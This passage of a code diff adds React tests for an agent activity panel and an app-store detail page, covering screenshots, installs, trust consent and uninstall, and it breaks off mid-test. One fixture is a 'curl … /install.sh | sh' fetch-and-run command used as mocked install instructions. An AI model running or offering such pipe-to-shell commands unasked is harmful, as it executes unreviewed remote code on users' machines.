+      many[id] = mkAgent(id, { status: 'done', result: 'inline', agent: `chip-${id}` })
+    }
+    const store = createTestStore()
+    store.dispatch(selectSubagent('a30'))
+    renderPanel(<ActivityViewer {...baseProps} view="subagents" subagents={many} />, store)
+
+    expect(await screen.findByText('chip-a30')).toBeInTheDocument()
+    await waitFor(() => expect(store.getState().chat.selectedSubagentId).toBeNull(), { timeout: 2000 })
+  })
+
+  it('lists only the workflow runs belonging to this chat', async () => {
+    stubFetch({
+      runs: [
+        { run_id: 'r1', name: 'ship report', status: 'running', session_key: `dashboard:${SLOT}` },
+        { run_id: 'r2', name: 'other chat run', status: 'finished', session_key: 'dashboard:elsewhere' },
+      ],
+    })
+    renderPanel(<ActivityViewer {...baseProps} view="workflows" />)
+
+    expect(await screen.findByText('ship report')).toBeInTheDocument()
+    expect(screen.queryByText('other chat run')).not.toBeInTheDocument()
+  })
+
+  it('shows the workflows empty state when this chat started none', async () => {
+    stubFetch({ runs: [{ run_id: 'r2', name: 'other run', status: 'running', session_key: 'dashboard:elsewhere' }] })
+    renderPanel(<ActivityViewer {...baseProps} view="workflows" />)
+
+    expect(await screen.findByText('No workflow runs')).toBeInTheDocument()
+  })
+
+  it('switches tabs through the internal segmented control', async () => {
+    const store = createTestStore()
+    renderPanel(<ActivityViewer {...baseProps} />, store)
+    // jsdom reports a zero-width parent, so the control collapses to a dropdown.
+    fireEvent.click(screen.getByRole('button', { name: /Files/ }))
+    fireEvent.click(screen.getByRole('button', { name: /Artifacts/ }))
+
+    await waitFor(() => expect(store.getState().chat.activityTab).toBe('artifacts'))
+  })
+
+  it('auto-switches to the subagents tab when a spawn approval arrives', async () => {
+    const { rerender } = renderPanel(<ActivityViewer {...baseProps} />)
+    expect(screen.queryByText('Approval Needed')).not.toBeInTheDocument()
+
+    rerender(
+      <ActivityViewer
+        {...baseProps}
+        toolLog={[
+          { type: 'reasoning', text: 'thinking', ts: 1 },
+          { type: 'approval', text: 'Reading /etc/hosts', ts: 2, approval_id: 'ap-3', approval_type: 'spawn' },
+        ]}
+      />,
+    )
+    expect(await screen.findByText('Approval Needed')).toBeInTheDocument()
+  })
+
+  it('follows a tab request made from elsewhere in the app', async () => {
+    const store = createTestStore()
+    renderPanel(<ActivityViewer {...baseProps} subagents={{ s1: mkAgent('s1') }} />, store)
+    await act(async () => { store.dispatch(openActivityToTab('subagents')) })
+
+    expect(screen.getByText('Complete')).toBeInTheDocument()
+  })
+
+  it('opens the full library from the Artifacts tab', async () => {
+    vi.mocked(api.artifacts).mockResolvedValue({ artifacts: [mkArtifact('design-doc')] })
+    function LocationProbe() {
+      return <span data-testid="path">{useLocation().pathname}</span>
+    }
+    const qc = new QueryClient({ defaultOptions: { queries: { retry: false } } })
+    const store = createTestStore()
+    render(
+      <Provider store={store}>
+        <QueryClientProvider client={qc}>
+          <MemoryRouter>
+            <ActivityViewer {...baseProps} view="artifacts" />
+            <LocationProbe />
+          </MemoryRouter>
+        </QueryClientProvider>
+      </Provider>,
+    )
+    fireEvent.click(await screen.findByRole('button', { name: /Browse all/ }))
+
+    await waitFor(() => expect(screen.getByTestId('path')).toHaveTextContent('/artifacts'))
+  })
+})

--- a/website/src/test/AppDetailPageCoverage.test.tsx
+++ b/website/src/test/AppDetailPageCoverage.test.tsx
@@ -1,0 +1,778 @@
+/**
+ * AppDetailPage — the branches the three focused suites leave cold.
+ *
+ * `AppDetailPage.test.tsx` pins built-in icon/hero resolution,
+ * `AppDetailPageAutoAction.test.tsx` pins the deep-link trigger and
+ * `AppDetailPageDeniedDeeplink.test.tsx` pins how a trust denial is surfaced.
+ * None of them reach the screenshot lightbox, the install-log panel, the
+ * client-install card, the uninstall confirmation, the per-lifecycle action sets
+ * or the info grid — which is most of what a user actually sees on this page.
+ *
+ * Harness matches the sibling suites exactly: MemoryRouter over the real route
+ * plus a QueryClientProvider, because `useTrustGate` invalidates the
+ * ['trusted-apps'] / ['apps'] queries after a grant and needs a client in scope.
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render, screen, fireEvent, waitFor, within, act } from '@testing-library/react'
+import { MemoryRouter, Routes, Route } from 'react-router-dom'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+
+// The resolved colour mode drives screenshot-set and hero selection, so it has
+// to be switchable per test. `vi.hoisted` keeps the box defined before the mock
+// factory runs during module import.
+const theme = vi.hoisted(() => ({ mode: 'light' as 'light' | 'dark' }))
+
+const getApp = vi.fn()
+const listRegistry = vi.fn()
+const system = vi.fn()
+const installFromRegistryStream = vi.fn()
+const enableApp = vi.fn()
+const disableApp = vi.fn()
+const updateApp = vi.fn()
+const uninstallApp = vi.fn()
+const trustApp = vi.fn()
+const untrustApp = vi.fn()
+
+vi.mock('../api/client', () => ({
+  api: {
+    getApp: (...a: unknown[]) => getApp(...a),
+    listRegistry: (...a: unknown[]) => listRegistry(...a),
+    system: (...a: unknown[]) => system(...a),
+    installFromRegistryStream: (...a: unknown[]) => installFromRegistryStream(...a),
+    enableApp: (...a: unknown[]) => enableApp(...a),
+    disableApp: (...a: unknown[]) => disableApp(...a),
+    updateApp: (...a: unknown[]) => updateApp(...a),
+    uninstallApp: (...a: unknown[]) => uninstallApp(...a),
+    trustApp: (...a: unknown[]) => trustApp(...a),
+    untrustApp: (...a: unknown[]) => untrustApp(...a),
+  },
+}))
+
+vi.mock('../hooks/useTheme', () => ({ useTheme: () => ({ theme: theme.mode }) }))
+vi.mock('../components/AppIcon', () => ({ default: () => <div data-testid="app-icon" /> }))
+
+import AppDetailPage from '../pages/AppDetailPage'
+
+/** Not one of the first-party names in APP_MANIFEST_KEY, so display name,
+ *  description and highlights fall through to the fixture instead of a catalog. */
+const NAME = 'ledger-lens'
+const DENIED = 'blocked by execution policy: third-party app execution is disabled'
+const TRUST_MODAL = /to run its own code\?/i
+
+type Dict = Record<string, unknown>
+
+/** The /api/apps/{name} shape: an installed, enabled, gateway-managed app. */
+function installedApp(overrides: Dict = {}): Dict {
+  return {
+    name: NAME,
+    displayName: 'Ledger Lens',
+    version: '1.0.0',
+    enabled: true,
+    origin: 'registry',
+    resources: 'gateway',
+    lifecycle: 'gateway',
+    installedAt: '2026-07-01T00:00:00Z',
+    manifest: {
+      displayName: 'Ledger Lens',
+      description: 'Reads your books and explains them.',
+      author: 'zezhexu',
+    },
+    ...overrides,
+  }
+}
+
+/** A /api/apps/registry row for the same name. */
+function registryRow(overrides: Dict = {}): Dict {
+  return {
+    name: NAME,
+    displayName: 'Ledger Lens',
+    description: 'Reads your books and explains them.',
+    version: '1.0.0',
+    author: 'zezhexu',
+    installed: false,
+    ...overrides,
+  }
+}
+
+function renderDetail() {
+  const qc = new QueryClient({ defaultOptions: { queries: { retry: false } } })
+  return render(
+    <QueryClientProvider client={qc}>
+      <MemoryRouter initialEntries={[{ pathname: `/apps/detail/${NAME}` }]}>
+        <Routes>
+          <Route path="/apps/detail/:name" element={<AppDetailPage />} />
+          <Route path="/apps" element={<div>apps list</div>} />
+          <Route path="/chat" element={<div>chat page</div>} />
+        </Routes>
+      </MemoryRouter>
+    </QueryClientProvider>,
+  )
+}
+
+/** Wait until the loaded page (not the spinner) is on screen. */
+async function loaded() {
+  await screen.findByTestId('app-icon')
+}
+
+/** Collect `mc:apps-changed` dispatches for the duration of one test. */
+function watchAppsChanged(): { count: () => number; stop: () => void } {
+  let n = 0
+  const onChange = () => { n += 1 }
+  window.addEventListener('mc:apps-changed', onChange)
+  return { count: () => n, stop: () => window.removeEventListener('mc:apps-changed', onChange) }
+}
+
+describe('AppDetailPage — uncovered surfaces', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+    theme.mode = 'light'
+    system.mockResolvedValue({ hostname: '' })
+    listRegistry.mockResolvedValue({ apps: [], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    getApp.mockResolvedValue(null)
+    installFromRegistryStream.mockResolvedValue({ ok: true })
+    enableApp.mockResolvedValue({ ok: true })
+    disableApp.mockResolvedValue({ ok: true })
+    updateApp.mockResolvedValue({ ok: true })
+    uninstallApp.mockResolvedValue({ ok: true })
+    trustApp.mockResolvedValue({ ok: true })
+    untrustApp.mockResolvedValue({ ok: true })
+  })
+
+  afterEach(() => {
+    delete (window as Window & { __mc_chat_launch?: unknown }).__mc_chat_launch
+  })
+
+  // --- Not found / load failure --------------------------------------------
+
+  it('renders the not-found page when neither the app nor the registry knows the name', async () => {
+    renderDetail()
+
+    expect(await screen.findByText('App Not Found')).toBeInTheDocument()
+    expect(screen.getByText(`App "${NAME}" not found`)).toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: /back to apps/i }))
+    expect(await screen.findByText('apps list')).toBeInTheDocument()
+  })
+
+  it('surfaces a malformed registry payload instead of crashing the page', async () => {
+    // Resolves (so the inline .catch does not fire) but has no `apps` — the
+    // outer try/catch is the only thing between this and a blank route.
+    listRegistry.mockResolvedValue(null)
+    renderDetail()
+
+    expect(await screen.findByText('App Not Found')).toBeInTheDocument()
+    expect(screen.getByText(/Cannot read properties of null/)).toBeInTheDocument()
+  })
+
+  it('renders the app even when the registry and system endpoints fail', async () => {
+    // Both are best-effort enrichment, so a failure must degrade to the
+    // installed record rather than taking the page down with it.
+    getApp.mockResolvedValue(installedApp())
+    listRegistry.mockRejectedValue(new Error('registry offline'))
+    system.mockRejectedValue(new Error('no system info'))
+    renderDetail()
+    await loaded()
+
+    expect(screen.getByText('Reads your books and explains them.')).toBeInTheDocument()
+    expect(screen.queryByText('registry offline')).not.toBeInTheDocument()
+  })
+
+  // --- Screenshot gallery + lightbox ---------------------------------------
+
+  const WITH_SHOTS = {
+    displayName: 'Ledger Lens',
+    description: 'Reads your books and explains them.',
+    author: 'zezhexu',
+    screenshots: ['/shots/light-one.png', '/shots/light-two.png', '/shots/light-three.png'],
+    screenshotsDark: ['/shots/dark-one.png', '/shots/dark-two.png'],
+  }
+
+  it('steps through the lightbox with the next and previous controls', async () => {
+    getApp.mockResolvedValue(installedApp({ manifest: WITH_SHOTS }))
+    renderDetail()
+    await loaded()
+
+    expect(screen.getByText('Screenshots')).toBeInTheDocument()
+    fireEvent.click(screen.getByRole('button', { name: 'Open screenshot 1' }))
+
+    const box = screen.getByRole('dialog')
+    expect(within(box).getByText('1 / 3')).toBeInTheDocument()
+    // On the first frame there is nothing before it.
+    expect(within(box).queryByRole('button', { name: 'Previous' })).not.toBeInTheDocument()
+
+    fireEvent.click(within(box).getByRole('button', { name: 'Next' }))
+    expect(within(box).getByText('2 / 3')).toBeInTheDocument()
+    fireEvent.click(within(box).getByRole('button', { name: 'Next' }))
+    expect(within(box).getByText('3 / 3')).toBeInTheDocument()
+    expect(within(box).queryByRole('button', { name: 'Next' })).not.toBeInTheDocument()
+
+    fireEvent.click(within(box).getByRole('button', { name: 'Previous' }))
+    expect(within(box).getByText('2 / 3')).toBeInTheDocument()
+
+    fireEvent.click(within(box).getByRole('button', { name: 'Close' }))
+    expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
+  })
+
+  it('drives the lightbox from the keyboard and closes on Escape', async () => {
+    getApp.mockResolvedValue(installedApp({ manifest: WITH_SHOTS }))
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Open screenshot 2' }))
+    const box = screen.getByRole('dialog')
+    expect(within(box).getByText('2 / 3')).toBeInTheDocument()
+
+    fireEvent.keyDown(box, { key: 'ArrowRight' })
+    expect(within(box).getByText('3 / 3')).toBeInTheDocument()
+    // Already on the last frame: ArrowRight must not run past the end.
+    fireEvent.keyDown(screen.getByRole('dialog'), { key: 'ArrowRight' })
+    expect(within(screen.getByRole('dialog')).getByText('3 / 3')).toBeInTheDocument()
+
+    fireEvent.keyDown(screen.getByRole('dialog'), { key: 'ArrowLeft' })
+    expect(within(screen.getByRole('dialog')).getByText('2 / 3')).toBeInTheDocument()
+
+    fireEvent.keyDown(screen.getByRole('dialog'), { key: 'Escape' })
+    expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
+  })
+
+  it('dismisses the lightbox on the backdrop but not on the image itself', async () => {
+    getApp.mockResolvedValue(installedApp({ manifest: WITH_SHOTS }))
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Open screenshot 1' }))
+    const box = screen.getByRole('dialog')
+
+    // The wrapper around the full-size image stops the backdrop-dismiss, so a
+    // click on the picture the user came to look at does not close it.
+    fireEvent.click(box.firstElementChild as HTMLElement)
+    expect(screen.getByRole('dialog')).toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('dialog'))
+    expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
+  })
+
+  it('hides a screenshot thumbnail whose image fails to load', async () => {
+    getApp.mockResolvedValue(installedApp({ manifest: WITH_SHOTS }))
+    renderDetail()
+    await loaded()
+
+    const thumb = screen.getByAltText('Screenshot 1') as HTMLImageElement
+    expect(thumb.style.display).toBe('')
+    fireEvent.error(thumb)
+    expect(thumb.style.display).toBe('none')
+  })
+
+  it('prefers the dark screenshot set when the resolved mode is dark', async () => {
+    theme.mode = 'dark'
+    getApp.mockResolvedValue(installedApp({ manifest: WITH_SHOTS }))
+    renderDetail()
+    await loaded()
+
+    expect((screen.getByAltText('Screenshot 1') as HTMLImageElement).getAttribute('src'))
+      .toBe('/shots/dark-one.png')
+    // The dark set is shorter, so the third light shot must not leak through.
+    expect(screen.queryByAltText('Screenshot 3')).not.toBeInTheDocument()
+  })
+
+  it('renders no screenshots section when the app ships none', async () => {
+    getApp.mockResolvedValue(installedApp())
+    renderDetail()
+    await loaded()
+
+    expect(screen.queryByText('Screenshots')).not.toBeInTheDocument()
+  })
+
+  it('hides a hero banner whose image fails to load', async () => {
+    getApp.mockResolvedValue(installedApp({
+      manifest: {
+        displayName: 'Ledger Lens',
+        description: 'Reads your books and explains them.',
+        // The detail-ratio banner wins over the Browse hero and sizes its own
+        // container, so both resolution arms are exercised here.
+        heroImageDetail: '/hero/detail-light.png',
+        heroImage: '/hero/browse-light.png',
+      },
+    }))
+    renderDetail()
+    await loaded()
+
+    const hero = document.querySelector('img[src="/hero/detail-light.png"]') as HTMLImageElement
+    expect(hero).not.toBeNull()
+    expect(hero.parentElement?.className).toContain('aspect-[25/6]')
+    expect(document.querySelector('img[src="/hero/browse-light.png"]')).toBeNull()
+
+    fireEvent.error(hero)
+    expect(hero.style.display).toBe('none')
+  })
+
+  // --- Install log panel ---------------------------------------------------
+
+  it('streams install log lines and hands a failed install to the agent', async () => {
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    installFromRegistryStream.mockImplementation(async (_n: string, onLine: (l: string) => void) => {
+      onLine('cloning repository')
+      onLine('installing dependencies')
+      return { ok: false, error: 'pip exploded' }
+    })
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+
+    expect(await screen.findByText('Install failed')).toBeInTheDocument()
+    const log = document.querySelector('pre') as HTMLPreElement
+    expect(log.textContent).toContain('cloning repository')
+    expect(log.textContent).toContain('installing dependencies')
+    expect(screen.getByText('pip exploded')).toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: /fix with ai/i }))
+
+    const launch = (window as Window & { __mc_chat_launch?: { message: string } }).__mc_chat_launch
+    expect(launch?.message).toContain('installing dependencies')
+    expect(launch?.message).toContain(`app-sources/${NAME}/`)
+    expect(await screen.findByText('chat page')).toBeInTheDocument()
+  })
+
+  it('closes the install log once a successful install has landed', async () => {
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    installFromRegistryStream.mockImplementation(async (_n: string, onLine: (l: string) => void) => {
+      onLine('done in 4s')
+      return { ok: true }
+    })
+    const changed = watchAppsChanged()
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    expect(await screen.findByText('Install complete')).toBeInTheDocument()
+    await waitFor(() => expect(changed.count()).toBeGreaterThan(0))
+    changed.stop()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Close' }))
+    expect(screen.queryByText('Install complete')).not.toBeInTheDocument()
+  })
+
+  it('reports a rejected install stream with the thrown message', async () => {
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    installFromRegistryStream.mockRejectedValue(new Error('network down'))
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    expect(await screen.findByText('network down')).toBeInTheDocument()
+    expect(screen.getByText('Install failed')).toBeInTheDocument()
+  })
+
+  it('aborts an in-flight install when the page unmounts', async () => {
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    let seen: AbortSignal | undefined
+    installFromRegistryStream.mockImplementation(
+      (_n: string, _l: unknown, signal: AbortSignal) => new Promise((_res, rej) => {
+        seen = signal
+        signal.addEventListener('abort', () => {
+          rej(Object.assign(new Error('aborted'), { name: 'AbortError' }))
+        })
+      }),
+    )
+    const view = renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    // Both the action button and the log card title read "Installing…".
+    await screen.findAllByText('Installing…')
+
+    view.unmount()
+    await waitFor(() => expect(seen?.aborted).toBe(true))
+  })
+
+  // --- Client-side install ------------------------------------------------
+
+  it('shows the terminal instructions and copies the resolved command', async () => {
+    system.mockResolvedValue({ hostname: 'dev-desk-1' })
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'darwin', arch: 'arm64' } })
+    installFromRegistryStream.mockResolvedValue({
+      needsClientInstall: true,
+      clientInstall: {
+        shell: 'curl {{gateway_url}}/install.sh | sh',
+        postInstall: 'open ssh://{{gateway_host}}',
+      },
+    })
+    const writeText = vi.fn()
+    Object.defineProperty(navigator, 'clipboard', { value: { writeText }, configurable: true })
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    expect(await screen.findByText('Install on your Mac')).toBeInTheDocument()
+
+    const resolved = `curl ${window.location.origin}/install.sh | sh`
+    expect(screen.getByText(resolved)).toBeInTheDocument()
+    expect(screen.getByText('open ssh://dev-desk-1')).toBeInTheDocument()
+    // The Get button is replaced by a statement of the requirement.
+    expect(screen.getByText('Requires local install')).toBeInTheDocument()
+    // The streaming log panel is dropped: nothing landed on the gateway.
+    expect(screen.queryByText('Install complete')).not.toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Copy command' }))
+    expect(writeText).toHaveBeenCalledWith(resolved)
+  })
+
+  it('falls back to the app platform block and a host placeholder', async () => {
+    // No hostname from the gateway and no clientInstall on the stream result:
+    // both fallbacks fire at once.
+    listRegistry.mockResolvedValue({
+      apps: [registryRow({ platform: { installMode: 'client', clientInstall: { shell: 'brew install lens --host {{gateway_host}}' } } })],
+      serverPlatform: { os: 'darwin', arch: 'arm64' },
+    })
+    installFromRegistryStream.mockResolvedValue({ needsClientInstall: true })
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    expect(await screen.findByText('brew install lens --host <your-cloud-desktop-host>')).toBeInTheDocument()
+    expect(screen.queryByText(/After installation, run/)).not.toBeInTheDocument()
+  })
+
+  it('clears the copied confirmation after two seconds', async () => {
+    vi.useFakeTimers({ shouldAdvanceTime: true })
+    try {
+      listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'darwin', arch: 'arm64' } })
+      installFromRegistryStream.mockResolvedValue({
+        needsClientInstall: true,
+        clientInstall: { shell: 'brew install lens' },
+      })
+      const writeText = vi.fn()
+      Object.defineProperty(navigator, 'clipboard', { value: { writeText }, configurable: true })
+      renderDetail()
+      await loaded()
+
+      fireEvent.click(screen.getByRole('button', { name: /install/i }))
+      const copy = await screen.findByRole('button', { name: 'Copy command' })
+
+      fireEvent.click(copy)
+      await waitFor(() => expect(copy.querySelector('.lucide-check')).not.toBeNull())
+
+      act(() => { vi.advanceTimersByTime(2100) })
+      await waitFor(() => expect(copy.querySelector('.lucide-check')).toBeNull())
+    } finally {
+      vi.useRealTimers()
+    }
+  })
+
+  // --- Trust consent retry -------------------------------------------------
+
+  it('opens the consent modal when the install REJECTS with the denial code', async () => {
+    // The non-streaming route answers 403 with the same code, and the client
+    // keeps the payload as a JSON string on .body — so the catch arm has to
+    // recognise it too, not only the resolved-payload arm.
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    installFromRegistryStream.mockRejectedValue(Object.assign(new Error(DENIED), {
+      name: 'ApiError',
+      status: 403,
+      body: JSON.stringify({ ok: false, error: DENIED, code: 'app_execution_denied' }),
+    }))
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    expect(await screen.findByText(TRUST_MODAL)).toBeInTheDocument()
+    // A refusal is a consent prompt, not an error: no log panel, no red card.
+    expect(screen.queryByText('Install failed')).not.toBeInTheDocument()
+  })
+
+  it('reports a second denial inline instead of closing on a silent no-op', async () => {
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    installFromRegistryStream.mockResolvedValue({ ok: false, error: DENIED, code: 'app_execution_denied' })
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    await screen.findByText(TRUST_MODAL)
+    fireEvent.click(screen.getByRole('button', { name: /trust this app and enable/i }))
+
+    // The grant did not take effect, so it is withdrawn and the modal stays up.
+    await waitFor(() => expect(untrustApp).toHaveBeenCalledWith(NAME))
+    expect(screen.getByText(TRUST_MODAL)).toBeInTheDocument()
+  })
+
+  it('re-runs the install after consent and closes the modal', async () => {
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    installFromRegistryStream
+      .mockResolvedValueOnce({ ok: false, error: DENIED, code: 'app_execution_denied' })
+      .mockResolvedValueOnce({ ok: true })
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    expect(await screen.findByText(TRUST_MODAL)).toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: /trust this app and enable/i }))
+
+    await waitFor(() => expect(trustApp).toHaveBeenCalledWith(NAME))
+    await waitFor(() => expect(screen.queryByText(TRUST_MODAL)).not.toBeInTheDocument())
+    expect(installFromRegistryStream).toHaveBeenCalledTimes(2)
+  })
+
+  it('keeps the modal open and rolls the grant back when the retry still fails', async () => {
+    listRegistry.mockResolvedValue({ apps: [registryRow()], serverPlatform: { os: 'linux', arch: 'arm64' } })
+    installFromRegistryStream
+      .mockResolvedValueOnce({ ok: false, error: DENIED, code: 'app_execution_denied' })
+      .mockResolvedValueOnce({ ok: false, error: 'still broken' })
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /install/i }))
+    await screen.findByText(TRUST_MODAL)
+    fireEvent.click(screen.getByRole('button', { name: /trust this app and enable/i }))
+
+    // The retry rejected, so the grant it was written for owns nothing — the
+    // gate withdraws it rather than leaving it over an absent app.
+    await waitFor(() => expect(untrustApp).toHaveBeenCalledWith(NAME))
+    expect(screen.getByText(TRUST_MODAL)).toBeInTheDocument()
+  })
+
+  // --- Installed-app actions ----------------------------------------------
+
+  it('disables an installed app and announces the change', async () => {
+    getApp.mockResolvedValue(installedApp())
+    const changed = watchAppsChanged()
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /disable/i }))
+    await waitFor(() => expect(disableApp).toHaveBeenCalledWith(NAME))
+    await waitFor(() => expect(changed.count()).toBeGreaterThan(0))
+    changed.stop()
+  })
+
+  it('enables a disabled app through the shared enable path', async () => {
+    getApp.mockResolvedValue(installedApp({ enabled: false }))
+    const changed = watchAppsChanged()
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /enable/i }))
+    await waitFor(() => expect(enableApp).toHaveBeenCalledWith(NAME))
+    await waitFor(() => expect(changed.count()).toBeGreaterThan(0))
+    changed.stop()
+  })
+
+  it('syncs a gateway-managed app that has no update waiting', async () => {
+    getApp.mockResolvedValue(installedApp())
+    renderDetail()
+    await loaded()
+
+    expect(screen.queryByRole('button', { name: /^update$/i })).not.toBeInTheDocument()
+    fireEvent.click(screen.getByRole('button', { name: /sync/i }))
+    await waitFor(() => expect(updateApp).toHaveBeenCalledWith(NAME))
+  })
+
+  it('reports a failed sync inline and lets the user dismiss it', async () => {
+    getApp.mockResolvedValue(installedApp())
+    updateApp.mockRejectedValue(new Error('git conflict'))
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /sync/i }))
+    expect(await screen.findByText('git conflict')).toBeInTheDocument()
+    // A raw backend sentence is a dead end on its own, so the card offers the
+    // hand-off alongside it.
+    expect(screen.getByRole('button', { name: /ask the agent/i })).toBeInTheDocument()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Dismiss error' }))
+    expect(screen.queryByText('git conflict')).not.toBeInTheDocument()
+  })
+
+  it('offers the registry install path for a self-managed app with an update', async () => {
+    getApp.mockResolvedValue(installedApp({ resources: 'app' }))
+    listRegistry.mockResolvedValue({
+      apps: [registryRow({ installed: true, updateAvailable: true })],
+      serverPlatform: { os: 'linux', arch: 'arm64' },
+    })
+    renderDetail()
+    await loaded()
+
+    expect(screen.getByText('Self-managed')).toBeInTheDocument()
+    expect(screen.getByText('Installed (v1.0.0)')).toBeInTheDocument()
+    fireEvent.click(screen.getByRole('button', { name: /^update$/i }))
+    await waitFor(() => expect(installFromRegistryStream).toHaveBeenCalled())
+  })
+
+  it('a locked built-in offers enable with the desktop requirement and no uninstall', async () => {
+    getApp.mockResolvedValue(installedApp({
+      origin: 'builtin',
+      lifecycle: 'locked',
+      enabled: false,
+      manifest: {
+        displayName: 'Ledger Lens',
+        description: 'Reads your books and explains them.',
+        platform: { requiresDesktopApp: true },
+      },
+    }))
+    renderDetail()
+    await loaded()
+
+    expect(screen.getByText('Built-in')).toBeInTheDocument()
+    expect(screen.getByText('Disabled')).toBeInTheDocument()
+    expect(screen.getByRole('button', { name: /enable/i })).toBeInTheDocument()
+    // Stated in text, not only in a hover title: a tooltip is unreachable by
+    // touch or keyboard, and this page is where the decision happens.
+    expect(screen.getByText(/the app's own window needs the Kiro Crew desktop app/i)).toBeInTheDocument()
+    expect(screen.queryByRole('button', { name: /uninstall/i })).not.toBeInTheDocument()
+  })
+
+  // --- Uninstall confirmation ---------------------------------------------
+
+  /** Open the uninstall dialog on a gateway-managed installed app. */
+  async function openUninstall() {
+    getApp.mockResolvedValue(installedApp())
+    renderDetail()
+    await loaded()
+    fireEvent.click(screen.getByRole('button', { name: /uninstall/i }))
+    return screen.findByRole('dialog', { name: /confirm uninstall/i })
+  }
+
+  it('keeps app data by default and cancels without calling the API', async () => {
+    const box = await openUninstall()
+
+    const keep = within(box).getByRole('checkbox', { name: /keep app data/i })
+    expect(keep).toBeChecked()
+
+    fireEvent.click(within(box).getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(screen.queryByRole('dialog', { name: /confirm uninstall/i })).not.toBeInTheDocument())
+    expect(uninstallApp).not.toHaveBeenCalled()
+  })
+
+  it('passes the keep-data choice through and returns to the list', async () => {
+    uninstallApp.mockResolvedValue({ ok: true, uninstall_log: 'removed 3 files' })
+    const box = await openUninstall()
+
+    fireEvent.click(within(box).getByRole('checkbox', { name: /keep app data/i }))
+    fireEvent.click(within(box).getByRole('button', { name: 'Uninstall' }))
+
+    await waitFor(() => expect(uninstallApp).toHaveBeenCalledWith(NAME, false))
+    expect(await screen.findByText('apps list')).toBeInTheDocument()
+  })
+
+  it('keeps the data when the checkbox is left alone', async () => {
+    const box = await openUninstall()
+
+    fireEvent.click(within(box).getByRole('button', { name: 'Uninstall' }))
+    await waitFor(() => expect(uninstallApp).toHaveBeenCalledWith(NAME, true))
+  })
+
+  it('dismisses the uninstall dialog on Escape', async () => {
+    const box = await openUninstall()
+
+    fireEvent.keyDown(box, { key: 'Escape' })
+    await waitFor(() => expect(screen.queryByRole('dialog', { name: /confirm uninstall/i })).not.toBeInTheDocument())
+  })
+
+  it('closes the dialog and reports a failed uninstall', async () => {
+    uninstallApp.mockRejectedValue(new Error('app is busy'))
+    const box = await openUninstall()
+
+    fireEvent.click(within(box).getByRole('button', { name: 'Uninstall' }))
+    expect(await screen.findByText('app is busy')).toBeInTheDocument()
+    expect(screen.queryByRole('dialog', { name: /confirm uninstall/i })).not.toBeInTheDocument()
+  })
+
+  // --- Info grid ----------------------------------------------------------
+
+  it('renders features, permissions, MCP servers, tags, resources and details', async () => {
+    getApp.mockResolvedValue(installedApp({
+      manifest: {
+        displayName: 'Ledger Lens',
+        description: 'Reads your books and explains them.',
+        author: 'zezhexu',
+        minKiroCrewVersion: '0.2.0',
+        highlights: ['Explains a balance sheet', 'Flags odd entries'],
+        tags: ['finance', 'reporting'],
+        agents: ['agents/auditor.json', 'agents/scribe.json'],
+        skills: ['skills/ledger-read/SKILL.md'],
+        crons: [{ name: 'nightly-close' }],
+        permissions: {
+          api: ['GET /api/ledger'],
+          events: ['ledger.updated'],
+          mcpTools: ['ledger_query'],
+          storage: true,
+          cron: true,
+          network: true,
+          memory: 'read',
+        },
+        mcpServers: {
+          ledgerd: {
+            url: 'http://127.0.0.1:9911/mcp',
+            command: 'uvx ledgerd',
+            autoApprove: ['ledger_read_only'],
+          },
+        },
+      },
+    }))
+    listRegistry.mockResolvedValue({
+      apps: [registryRow({ installed: true, repo: 'https://example.invalid/ledger-lens' })],
